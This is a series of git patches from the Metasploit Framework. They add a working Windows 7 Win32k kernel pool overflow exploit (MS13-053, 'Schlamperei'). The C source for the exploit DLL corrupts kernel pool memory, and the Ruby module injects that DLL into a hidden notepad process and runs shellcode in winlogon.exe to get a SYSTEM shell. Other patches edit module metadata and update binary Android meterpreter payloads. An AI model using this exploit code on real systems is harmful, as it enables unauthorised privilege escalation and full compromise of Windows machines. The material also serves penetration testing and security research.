edx, 7ffe0300h + call [edx] + add esp, 20h + } +} + +typedef struct _CLIENT_ID +{ + PVOID UniqueProcess; + PVOID UniqueThread; +} CLIENT_ID, *PCLIENT_ID; + +typedef long (*_RtlCreateUserThread)(HANDLE, + PSECURITY_DESCRIPTOR, + BOOLEAN,ULONG, + PULONG,PULONG, + PVOID,PVOID, + PHANDLE,PCLIENT_ID); + +_RtlCreateUserThread RtlCreateUserThread; + +int Schlamperei(LPVOID shellcode) +{ + // Create window which will execute the wndproc in kernel mode + HWND wnd = createhelperwnd(); + + // Retrieve memory address of window using gSharedInfo + DWORD addressofwnd = gethandleaddress(wnd); + + HMODULE ntdll=LoadLibraryA("ntdll.dll"); + RtlCreateUserThread=(_RtlCreateUserThread)GetProcAddress(ntdll,"RtlCreateUserThread"); + + // Allocate fake EPROCESS in user mode + // see "Kernel Pool Exploitation on Windows 7" by Tarjei Mandt + if(!AllocFakeEProcess(addressofwnd-0x80+0x15)) { + return 0; + } + + // Create window in new thread to trigger inter thread message sending + HANDLE thread = CreateThread(0,0,(LPTHREAD_START_ROUTINE)windowthreadproc,0,0,0); + + Sleep(0x1000); + + // 0x9 is size of allocation, results in buffer (8 + 4) = 12 + // 8 byte block allocations = 16 bytes + // so we will copy in 8*2 bytes = 16 bytes to corrupt the pool pointer + unsigned char *buf = (unsigned char *)malloc(16); + for(int i=0; i<0x40; i++) { + NtUserMessageCall(gHwnd, 0xd, 0x8, (LPARAM)buf, 0x0, 0x2b3, 0x10); + } + + SendMessage(wnd, 0x401, addressofwnd, 0x0); + + ExitProcess(0); +} + +extern HINSTANCE hAppInstance; + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { + BOOL bReturnValue = TRUE; + switch (dwReason) { + case DLL_QUERY_HMODULE: + hAppInstance = hinstDLL; + if (lpReserved != NULL) { + *(HMODULE *)lpReserved = hAppInstance; + } + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + Schlamperei(lpReserved); + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +}; + + diff --git a/modules/exploits/windows/local/ms13_058_schlamperei.rb b/modules/exploits/windows/local/ms13_058_schlamperei.rb new file mode 100644 index 0000000000..069cb6e5fd --- /dev/null +++ b/modules/exploits/windows/local/ms13_058_schlamperei.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/post/windows/reflective_dll_injection' +require 'rex' + +class Metasploit3 < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::Windows::FileInfo + include Msf::Post::Windows::ReflectiveDLLInjection + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'ms13_053_schlamperei', + 'Description' => %q{ + A kernel pool overflow in Win32k which allows local privilege escalation. Used in pwn2own 2013 to break out of chrome's sandbox. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nils&Jon (MWR) - original exploit', # vulnerability discovery and initial exploit + 'Donato&BenCampbell (MWR) - ported to metasploit' # porting vuln to metasploit + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Targets' => + [ + [ 'Windows 7 SP0/SP1', { } ] + ], + 'Payload' => + { + 'Space' => 4096, + 'DisableNops' => true + }, + 'References' => + [ + [ 'CVE', '2013-1300' ], + [ 'MSB', 'MS13-053' ], + [ 'URL', 'https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/' ] + ], + 'DisclosureDate' => 'Dec 01 2013', + 'DefaultTarget' => 0 + })) + end + + def check + os = sysinfo["OS"] + if (os =~ /windows/i) == nil + return Exploit::CheckCode::Unknown + end + + file_path = expand_path("%windir%") << "\\system32\\win32k.sys" + major, minor, build, revision, branch = file_version(file_path) + vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") + + case build + when 7600 + return Exploit::CheckCode::Vulnerable + when 7601 + return Exploit::CheckCode::Vulnerable if revision <= 1800 + end + return Exploit::CheckCode::Unknown + end + + + def exploit + if is_system? + fail_with(Exploit::Failure::None, 'Session is already elevated') + end + + if sysinfo["Architecture"] =~ /wow64/i + fail_with(Failure::NoTarget, "Running against WOW64 is not supported") + elsif sysinfo["Architecture"] =~ /x64/ + fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") + end + + if check != Exploit::CheckCode::Vulnerable + fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") + end + + print_status("Launching notepad to host the exploit...") + notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true}) + begin + process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) + print_good("Process #{process.pid} launched.") + rescue Rex::Post::Meterpreter::RequestError + print_status("Operation failed. Trying to elevate the current process...") + process = client.sys.process.open + end + + print_status("Reflectively injecting the exploit DLL into #{process.pid}...") + library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.dll") + library_path = ::File.expand_path(library_path) + + print_status("Injecting exploit into #{process.pid}...") + exploit_mem, offset = inject_dll_into_process(process, library_path) + + thread = process.thread.create(exploit_mem + offset) + client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000) + + processes = client.sys.process.get_processes + processes.each do |p| + if p['name'] == "winlogon.exe" + winlogon_pid = p['pid'] + print_status("Found winlogon.exe with PID #{winlogon_pid}") + if execute_shellcode(payload.encoded, nil, winlogon_pid) + print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell") + else + print_error("Failed to start payload thread") + end + break + end + end + end + +end + From 257c121c7538df426d719373b3d7eae10a63da0c Mon Sep 17 00:00:00 2001 From: kyuzo Date: Thu, 6 Mar 2014 20:34:01 +0000 Subject: [PATCH 042/853] Adding MS013-058 for Windows7 x86 --- modules/exploits/windows/local/ms13_058_schlamperei.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/ms13_058_schlamperei.rb b/modules/exploits/windows/local/ms13_058_schlamperei.rb index 069cb6e5fd..9deaf504e2 100644 --- a/modules/exploits/windows/local/ms13_058_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_058_schlamperei.rb @@ -25,8 +25,9 @@ class Metasploit3 < Msf::Exploit::Local 'License' => MSF_LICENSE, 'Author' => [ - 'Nils&Jon (MWR) - original exploit', # vulnerability discovery and initial exploit - 'Donato&BenCampbell (MWR) - ported to metasploit' # porting vuln to metasploit + 'Nils&Jon (MWR) - original exploit', + 'Donato Capitella - ported to metasploit', + 'Ben Campbell - ported to metasploit' ], 'Arch' => ARCH_X86, 'Platform' => 'win', From 6d748f49d31c7524511d6501c6490236b33b812f Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 7 Mar 2014 10:49:30 -0800 Subject: [PATCH 043/853] Update myBB_GetTypeDB.rb MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 1.I added comment header; 2.I made ​​a link to your account as a comment; 3.I added a link https://github.com/rapid7/metasploit-framework/pull/3070 Items 2 and 3 on the advice wchen-r7 --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 5b14a969c7..9106a4f746 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,3 +1,8 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -15,13 +20,13 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - 'Arthur Karmanovskii', # Discovery - 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module + # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii ' # Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ - [ '0 - days', '2014-13-02' ] + [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], 'Privileged' => false, 'Platform' => ['php'], @@ -115,4 +120,3 @@ class Metasploit3 < Msf::Auxiliary end end - From 6616d36d6313ff35739c1f3f71d3d15ae35ba03c Mon Sep 17 00:00:00 2001 From: joe Date: Fri, 7 Mar 2014 13:21:30 -0800 Subject: [PATCH 044/853] New meterpreter bins for testing. --- data/android/apk/AndroidManifest.xml | Bin 3588 -> 3536 bytes data/android/apk/classes.dex | Bin 6844 -> 10700 bytes data/android/apk/resources.arsc | Bin 1104 -> 1088 bytes data/android/meterpreter.jar | Bin 37661 -> 37700 bytes data/android/metstage.jar | Bin 1993 -> 1851 bytes data/android/shell.jar | Bin 1853 -> 1853 bytes data/meterpreter/ext_server_stdapi.jar | Bin 38782 -> 38782 bytes data/meterpreter/meterpreter.jar | Bin 24427 -> 24427 bytes 8 files changed, 0 insertions(+), 0 deletions(-) diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml index 39fa1cea0e34dfb14a1666dbe18fab55ba0fbcbb..6ee7f3e36fed7e9e467fff4db6fd95f5a44848f9 100644 GIT binary patch literal 3536 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 diff --git a/data/android/apk/resources.arsc b/data/android/apk/resources.arsc index 4fe928b45ed5fab291d93e0fdecab81f29535e1f..9175daa84ec0e56982572ea3b65c8ccf7083b71b 100644 GIT binary patch delta 168 zcmcb>ae#xBiGhc~VIr$Ks|5oCL(;@(>xm{>6Q?OL_H5j#%cN++-~kk70%ArW1}RYh zVgy()@uTQu1!f*bhRM3jlEM(>%s_d#@`)dnCpQ2UFi!4;D_}ua@PJtjs+SdA%7H}y E01jaqIRF3v delta 219 zcmX@Wae;%CiGhb9U?QtJs}=(TL(;@d-H9d^6Q?OL&e^zAmr2`#!3QYJ1jLL$Yy-q9 zK#Twj;7pduiY&sD6_`16K`NP;1QW!&d#>baC?lf~BVb@)AVk|)%OLz88!-Y3f~u^RG^e7P9Ji{p znxdR6P>V}d?)eV_g6udib{`KuDpbPdWy4Fc43}-yAbTJzxq^B`v5+yz$Y8Tamwof0 z>(++`HP~|GVN5aLjUbmQs@;SvU170!GL1s`pfFe7(iEN=-O3XXlzC9U6u^6Uqrb(; zR|Ycwb7W;h`^EqFS0>z6Dc!XO&N8OOHTA6Lq0-P%mOE^zP(MTsWps=rOuXH&*AeHu zel-5Cb$ojL_J7ymXy#?<#BJg1$mMA1Vdn1Q;B4!`t@^)rIhD-3%rwk=9h}X+aJ#%7 z<>Kb-V(I2#Yv~U3QXg05RN_!n{j5-~b*9RpJievr#r_9{FOK-l7|EN2$~PRL3h&+u z%k&OICc`T@n#zRv0TXi?9~LHf-!Ak6!r8l6dKw}8gF+$zUG5J}@9SFMG6NdI+3U*Q z^K}||{;%UrBkze06TOP#c51Nsq zpD(`sbCD7goX*x8>`+QSU59A(>!SSb+i%63jd)uFQu;kndVevgvgrV6BAh~7Fa}^+ zu&YEYX-0sa7KM~pi}%;YA@MEq9bR_-nh@9qRLc9tI+v@)`m{z;{>y5K+)v@R1>0Y_ z+Khg;Xl2Aa;qSg5*E>3nByIZ$hNUnWw_`p@lf^u zePgKRWH!Ocm0^HAS6tMuh=XC<3xCr{9Dg=ELG%6e=l}<#MUe6k7AM;02Q})(_=IAU zbUN9&`H>;+ljyC2H0wX&Vk7C6ZM&$x$*LXOqg1)@c>+qh6QUael3L^TsUW>XQIQV2 z63q&wNL;UP9l6i=J;z1P%!{dvKlZDhBD<@2rODY1>KFc@fH!OVz5FtOQ+{PQyeMe$ zR^0~g_oWNpr(t(j5+9!kM+;~xmq^6*l8U{h5T-%r?)j$_zK4&U-c1xgGV1)*&`6`} zL2ZlxANVQs)Ea+r%bb$ta{GoUCeL!@&x!db4f^twcfhNyyed~s?;*?2QoQCJqEg$v z|Jb&+|5XfW7}H5B1$xLF1c-hi=ucH=+2^-=dz(a;1SULFQMD!P5xQmgK$TQdWL9vT z)z4KgJkTtF{C9F_G;`WHWy$#2_D3&~;h>9QgLmkkFsJtlB0t?TPVOBywS9Y2)-v4d zM7=)Be>0Z$8YKwQkUBkCaH1X?`-^A*{2aPICB5S}Idc7Pd=Kq`?D2ZC`TI`|G5)hS zR6nDG!i{;Y@YI;e$q+MD?vr?>ZUpWwogxEv$(pNfiqe$PvuyhlQG>*<2FSSnSH`D+ zG8rSuN|_-6*g`vV8TRBnFXTtezBQSK^@NH3uW7bXui;rk)R;wojgQzM))`}$p%J!` zRY#J~`@4eF?HOGeK~hGPI%AckZgc#P_>Z64dWp18O6_!YzpX*m!57!hc5?+$g)KK3 zyyBq#dNGU}UK*ZxR72{(ozjGsRyW+z^XPi|^(&fbQf 